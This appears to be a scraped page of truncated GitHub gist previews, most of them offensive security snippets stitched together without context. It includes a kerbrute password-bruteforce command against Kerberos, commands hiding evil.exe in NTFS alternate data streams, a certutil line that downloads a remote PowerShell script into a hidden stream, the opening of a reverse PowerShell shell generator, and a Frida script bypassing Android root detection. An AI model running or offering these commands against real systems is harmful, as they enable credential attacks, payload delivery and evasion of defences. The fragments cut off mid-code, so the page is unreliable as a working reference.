@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With the Rubeus version that includes the brute module:

@api0cradle
api0cradle / Exe_ADS_Methods.md
Last active May 4, 2024 03:48
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

@tothi
tothi / mkpsrevshell.py
Created February 17, 2019 00:05
reverse PowerShell cmdline payload generator (base64 encoded)
#!/usr/bin/env python3
#
# generate reverse powershell cmdline with base64 encoded args
#
import sys
import base64
def help():
    print("USAGE: %s IP PORT" % sys.argv[0])
@mdonkers
mdonkers / server.py
Last active April 30, 2024 23:26
Simple Python 3 HTTP server for logging all GET and POST requests
#!/usr/bin/env python3
"""
License: MIT License
Copyright (c) 2023 Miel Donkers
Very simple HTTP server in python for logging requests
Usage::
./server.py [<port>]
"""
from http.server import BaseHTTPRequestHandler, HTTPServer
@muff-in
muff-in / resources.md
Last active April 27, 2024 22:37
A curated list of Assembly Language / Reversing / Malware Analysis / Game Hacking-resources
@mccabe615
mccabe615 / phpdangerousfuncs.md
Last active April 21, 2024 17:04
Dangerous PHP Functions

Command Execution

exec           - Returns last line of command's output
passthru       - Passes command's output directly to the browser
system         - Passes command's output directly to the browser and returns last line
shell_exec     - Returns command's output
`` (backticks) - Same as shell_exec()
popen          - Opens read or write pipe to process of a command
proc_open      - Similar to popen() but greater degree of control
pcntl_exec     - Executes a program
@cihanmehmet
cihanmehmet / password-wordlist.txt
Created November 19, 2020 11:34
Password Wordlist(235k)
@cihanmehmet
cihanmehmet / subdomain_wordlist.md
Last active March 26, 2024 03:12
Subdomain Wordlist
@rootsec1
rootsec1 / fridascript.js
Last active March 25, 2024 07:26
Bypass SSL certificate pinning and evade root detection on Android (Frida script)
Java.perform(function () {
    console.log("\nRoot detection bypass with Frida");
    var CommonUtils = Java.use("io.fabric.sdk.android.services.common.CommonUtils");
    console.log("\nHijacking isRooted function in CommonUtils class");
    CommonUtils.isRooted.implementation = function () {
        console.log("\nInside the isRooted function");
        return false;
    };
    console.log("\nRoot detection bypassed");
    console.log("\n");